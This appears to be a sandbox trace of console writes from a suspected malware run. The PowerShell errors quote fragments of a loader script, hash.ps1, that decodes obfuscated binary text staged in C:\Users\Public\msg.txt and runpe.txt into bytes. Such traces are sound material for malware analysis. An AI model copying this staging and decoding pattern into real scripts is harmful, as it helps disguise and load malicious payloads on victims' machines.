WriteConsoleW
|
buffer:
Get-Content : A parameter cannot be found that matches parameter name 'Raw'.
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:18 char:59
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $Jxxxe = (Get-Content -Path "C:\Users\Public\msg.txt" -Raw <<<< ) -replace "%
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
","0" -replace "!","1" -replace "@","A"
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidArgument: (:) [Get-Content], ParameterBin
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
dingException
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ands.GetContentCommand
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Get-Content : A parameter cannot be found that matches parameter name 'Raw'.
console_handle:
0x00000097
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:21 char:62
console_handle:
0x000000a3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $geGWHZ = (Get-Content -Path "C:\Users\Public\runpe.txt" -Raw <<<< ) -replace
console_handle:
0x000000af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
"%","0" -replace "!","1" -replace "@","A"
console_handle:
0x000000bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidArgument: (:) [Get-Content], ParameterBin
console_handle:
0x000000c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
dingException
console_handle:
0x000000d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
console_handle:
0x000000df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ands.GetContentCommand
console_handle:
0x000000eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Method invocation failed because [System.Collections.Generic.List`1[[System.Byt
console_handle:
0x0000010b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
e, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]
console_handle:
0x00000117
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
]] doesn't contain a method named 'new'.
console_handle:
0x00000123
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:2 char:55
console_handle:
0x0000012f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $JS = [System.Collections.Generic.List[Byte]]::new <<<< ()
console_handle:
0x0000013b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept
console_handle:
0x00000147
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x00000153
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : MethodNotFound
console_handle:
0x0000015f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:4 char:16
console_handle:
0x0000001b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $JS.Add <<<< ([Convert]::ToByte($Jxxxe.Substring($i, 8), 2))
console_handle:
0x00000033
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (Add:String) [], RuntimeExcept
console_handle:
0x00000043
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x0000004f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : InvokeMethodOnNull
console_handle:
0x0000005b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x0000007b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:4 char:16
console_handle:
0x00000087
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $JS.Add <<<< ([Convert]::ToByte($Jxxxe.Substring($i, 8), 2))
console_handle:
0x00000093
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (Add:String) [], RuntimeExcept
console_handle:
0x0000009f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x000000ab
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : InvokeMethodOnNull
console_handle:
0x000000b7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:4 char:16
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $JS.Add <<<< ([Convert]::ToByte($Jxxxe.Substring($i, 8), 2))
console_handle:
0x000000ef
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (Add:String) [], RuntimeExcept
console_handle:
0x000000fb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x00000107
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : InvokeMethodOnNull
console_handle:
0x00000113
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x00000133
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:4 char:16
console_handle:
0x0000013f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $JS.Add <<<< ([Convert]::ToByte($Jxxxe.Substring($i, 8), 2))
console_handle:
0x0000014b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (Add:String) [], RuntimeExcept
console_handle:
0x00000157
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x00000167
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : InvokeMethodOnNull
console_handle:
0x00000173
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x00000193
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\hash.ps1:4 char:16
console_handle:
0x0000019f
|
1
|
1 |
0
|